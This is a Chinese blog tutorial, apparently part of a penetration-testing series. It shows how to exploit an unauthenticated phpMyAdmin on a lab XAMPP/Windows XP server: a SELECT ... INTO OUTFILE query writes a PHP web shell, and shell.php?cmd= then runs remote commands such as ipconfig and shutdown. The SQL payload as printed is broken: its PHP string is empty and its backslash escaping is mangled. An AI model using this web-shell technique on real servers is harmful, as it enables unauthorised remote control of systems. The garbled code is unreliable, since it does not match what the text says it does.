<strong>本文仅用于讨论网络安全技术,以保护信息安全为目的,请勿用于非法用途!
什么是phpmyadmin
之前我们在xp安装过xampp web应用平台,大家已经知道这个版本的xampp集成了apache、mysql、filezilla ftp等web应用软件。那么为了方便管理员操作数据库,xampp里面也会自带phpmyadmin软件,这是一个用于管理数据库的软件,而且一般以网页的形式进行登录管理的。
注意:xp如果重启过,一定要双击"xampp"的桌面图标进行运行!
而且要保证xampp必须如下图所示:
登录xp的phpmyadmin(kali浏览器输入):<strong>192.168.31.50/phpmyadmin
这个就是数据库管理页面:
生成php脚本
<strong>我们主要是利用这个版本的xampp 中的phpmyadmin配置有误:什么错误?就是这个版本的xampp登录phpmyadmin不需要验证登录,如果设置正确,phpmyadmin是绝对不允许其他主机进行登录的,毕竟这是数据库操作后台!另外即使可以登录,你也要输入凭证进行登录!
我们要打开这个phpmyadmin管理页面,然后使用mysql查询命令向xp的web服务器上生成脚本文件,然后利用这个脚本文件获取远程服务器的shell。
详细讲:使用SQL中的SELECT语句,将一个php脚本写入到web服务器上,形成一个web文件。最终借助这个脚本程序远程控制目标系统!不过这都是要借助安装在底层服务的apache服务,因为只有它可以运行php脚本文件。
- SQL查询命令如下:
<strong>select "" into outfile "C:\\\\\\xampp\\\\htdocs\\\\shell.php"
这里全部使用英文输入,而且文件目录使用的是双反斜杠符号,而不是windows常用"\"!
<strong>select:SQL关键字语句;
<strong>:使用脚本url中的system()函数命令获取系统权限,参数是cmd终端命令。然后这个脚本就会以system的身份执行。
<strong>into outfile:脚本生成就会写进后面的蓝色目录下的自定义文件shell.php(shell.php是自己定义的,任意即可)
<strong>C:\\\\\\xampp\\\\htdocs\\\\shell.php:指定xampp安装apache默认安装路径(默认是xampp\\htdocs\\),并且在这个根路径下自动创建一个自定义的shell.php,前面的脚本就会被写进这个shell.php中。
此时,已经完成了一个能够调用xp系统权限下的cmd命令的php脚本!它存在xampp web服务器中的apache安装路径下,接下来只要使用任何电脑都可以远程访问这个shell.php文件,倘若给cmd参数指定选项,就会远程操控xp服务器!
- 登录(kali浏览器登录)
<strong>192.168.31.50/phpmyadmin
这里坚决不能复制上面的彩色代码,只能手打输入!
点击"Go",只要显示下图即表示生成脚本成功,否则,一定要严格检查上面的SQL语句是否输入错误!(一定要英文输入法手打进去!!!)
另外大家可以修改language成中文
大家也可以查询xp中xampp\\htdocs\\下是否有生成的shell.php文件。
- 既然攻击命令的脚本已经生成,那该如何利用验证呢?很简单,kali浏览器直接访问<strong>192.168.31.50/shell.php,就可运行我们上面生成的脚本。大家试试看!
提示警告:意思就是说我们没有给system()函数指定参数,上面我们知道参数应该是cmd,所以这个cmd变量我们需要给他指定一个值!
利用此脚本攻击phpmyadmin后台
<strong>你只需要在kali浏览器输入:
<strong>192.168.31.50/shell.php?cmd=xxxx
?cmd= ,表示指定参数cdm,=后面可以填写任意的windows cdm命令。
例子运用:
- <strong>192.168.31.50/shell.php?cmd=ipconfig:通过攻击重看xp的网络配置
仔细看,竟然成功显示了xp的ip、子网掩码、路由器网关ip。
- <strong>192.168.31.50/shell.php?cmd=ping baidu.com
看看,就像使用本地的cmd终端一样,竟然远程操控xp ping了baidu.com,而且也返回了数据!说明xp可以连接互联网的。
- <strong>192.168.31.50/shell.php?cmd=shutdown -t -s 10
这个就是cmd中的自动10秒钟后远程xp关机命令,是不是很好玩?
当然,xp关闭,我们的kali就和它失去通信了。
xp已经进行了关机,只是xp中的xampp服务没有人为关闭,系统会弹出窗口提醒你是否强制关闭,一旦点击"End Now",就会关机!(任何windows电脑中只要还有主要的应用程序在运行,此时进行关机,都会提醒关闭程序后再关机的,以免造成程序数据丢失)
至于更多的cmd命令,你可以去网上搜搜,这里不再详细列出,请自行练习!
到目前为止,我们通过phpmyadmin数据库管理后台进行了SQL查询命令,生成了调用远程系统system()命令的脚本,指定参数是cmd终端,之后只要在kali浏览器中输入生成脚本的路径192.168.31.50/shell.php,指定cmd的可用cmd命令,就可以远程控制xp web服务器,执行你想要控制目标系统的远程命令!
kali渗透我想说
更多<strong>kali渗透、Web渗透、安卓渗透等相关技术。请关注小白嘿客,私信获取。欢迎在下方评论区留言讨论!
閱讀更多 小白嘿客 的文章